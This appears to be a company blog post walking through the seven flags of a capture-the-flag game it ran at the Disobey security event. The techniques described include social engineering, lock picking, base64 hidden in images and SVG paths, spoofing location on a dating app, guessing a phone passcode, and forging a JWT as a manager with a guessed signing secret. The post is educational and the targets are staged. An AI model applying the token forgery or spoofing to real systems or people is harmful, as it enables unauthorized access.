Gofore attended Disobey for the first time. We wanted contribute to the catch the flag activities and I had an honour to be part of the team. Here is a walkthrough for the flags.
Credits to Cleviane Rebeca Silva, Timo Tammi and Otto Salminen for the final flag.
We had in total seven flags and two of them remained unsolved. Some of the flags were connected and even though some flags were relatively easy they also contained hints for solving something else. Five of the flags were available from Friday and two were only on Saturday. We had some physical flags that were located at the Gofore stand in Disobey.
The background story in our CTF activities was:
The CEO of Erofog is asking for your help. One of their employees Seppo Sorsa seems a bit forgetful and sloppy. Are the company secrets compromised? Follow Seppo’s trail.
The First Flag: The card
First flag was about Seppo losing his member card. The task was to social engineer one of Gofore employees at the stand on Disobey to show the card and then take a photo of it. The card contained a pdf417 format barcode that you could read to obtain the flag.
The Second Flag: Twitter
The second flag was hidden in Seppo Sorsa’s twitter account. There was 8 pictures of which one contained a hint for another flag. Most of the pictures were AI-generated.
Only one of the photos looked like it was directly uploaded from a phone and had better resolution than the others. To me it was a surprise that this flag wasn’t easy at all as it remained unsolved. The flag was hidden in plain sight.
In the description of the CTF the format of the flag was given. All the flags started with GFLAG. So we knew that if we saw something starting with R0ZMQU we’d know that it was probably the flag in base64 format. It is quite usual for the CTF puzzles to encode the flag. If you magnify the photo you notice some text that appears to be part of a base64 encoded flag by the base of the tone arm. After manipulating the colors you can see the rest of the flag and it is indeed the flag in base64.
There was many ways of getting the flag text from the image. One could code an image to text converter for base64 or just manually read the text for example. The trick was that probably none of the image to text converters in the internet work directly on this as they’re meant for natural languages so they got at least some of the characters wrong. After converting the base64 to string you have the flag.
The Third Flag: The Lock
The third flag was a physical one. There was a file cabinet with a lock and a lockpick set at Disobey.
After picking the lock the cabinet seemed empty but there was actually a notebook under the bottom.
The notebook contained the flag as well as a mysterious password to intra.
The Fourth Flag: The repository
The next flag was in a repository in Github. Seppo’s side project had a public repository https://github.com/erofog/Seppo_love. One of the files contained something extra. The repository had a bulk Android project with some commits. The code in the commits was nothing special. From the commits you could immediately find something interesting but we’ll skip that for now. The project looks quite normal so let’s go to the resources that have some interesting looking files. In order to solve this flag one needed to have an eye for a detail and/or understanding of picture formats.
The icon.svg and icon1.svg look like they could contain something. On a closer inspection you can see that icon1 indeed contains an extra base64 comment between the .
The decoded message is : This is not the file you’re looking for.
Ok so we’re maybe close but not quite there. As the other icon.svg is virtually the same file we should not use time on that either. Let’s start looking into the next image file called loginfailed_icon.svg. SVG is a format where the picture consists of vectors that draw certain parts of the picture. On a closer inspection you can see that one of the vector paths has very different looking points than the other paths. There are more and they’re integers instead of decimals. Also the different looking path doesn’t draw anything. You can see that from looking at the fill and stroke attributes. In the visible vectors the fill and stroke have a value of #00000 where as in the invisible vector the value is none.
We can try and see what it draws if we modify fill and stroke to #00000.
Well that didn’t make sense. Maybe there is something in the numbers? As the numbers are clearly not points in the picture and their format differs from the other points we could try and see what the integers would look like as characters. With a simple python script we can convert the integers to characters. After printing the characters we see that they look like base64. Let’s continue. Then just join and decode and there it is! The flag is found. Here is an example code for solving this:
The Fifth Flag: Tinder
In this task we were suppose to use the hints from the repository to find Seppo’s profile in some other service. So this was found when solving flag number 4. From the commits in the repository you can find deleted rows that contain interesting information:
From this we can deduct (or google) that Seppo is using Tinder with a location somewhere in Kittilä. First let’s find out what are the coordinates for Pokka. With a location spoofer we can set our location to Pokka, Kittilä. Log in Tinder with the spoofed location.
Then it is up to the other parameters to find the correct profile. Apparently Tinder is not very accurate with the location so there might have been a small chance of luck in the game too. Using a slightly different location could help. The profile that was used in finding Seppo could be 29km apart from the location. Also they needed to be maximum of 10 years younger or older than Seppo who is 48 years old. His age was available in his Twitter. After “being in the correct location” and being correct aged profile you could see the profile that contained the flag:
The Sixth Flag: Phone
The first flag for Saturday was a physical one. The task was to get in to Seppo’s phone with the hints from social media. Seppo had shared in Twitter the year he was born and that was the passcode to the phone. In the phone there was the flag that could be found in the calendar. However the browser contained something interesting too. There was a website address saved as a bookmark which was essential for the next task. Submitting this flag opened the final task.
The Final Flag: The intranet
The 7. task was the intranet. So far we had gathered the website address from the phone task and the intranet password from the lock picking task.
After logging in there was a control panel with different projects and a downloadable report.
Let’s download the report first.
The report had binary that on a closer inspection was not a lead.
We can try to see if the other projects have something in them. So after changing the project there is an interesting looking button.
Pressing it gives a warning that we don’t have a permission and we should contact our manager.
From the intranet we can find Seppo’s profile where we find out the manager. There might be something important in the About me section too?
Let’s start looking at the webpage with a little more detail. Something in the token catches the eye. Paste the token in jwt.io to see what it contains. There is the user and then a secret. We already know we want to be able to sign in as the manager and we know the managers name.
Maybe Seppo’s profile gave a hint about the secret? What was it about Seppo liking this retro game called H.E.R.O?
Change the token with user being kylli.kyyber@erofog.com and the secret Helicopter Emergency Rescue Operation.
Then let’s try if we can use the new token to make it seem like we’re logged in as Kylli Kyyber.
I used Burp Suite to intercept and manipulated the token before sending it and there it is: the final flag
Here is an actual footage of the CTF action at Disobey: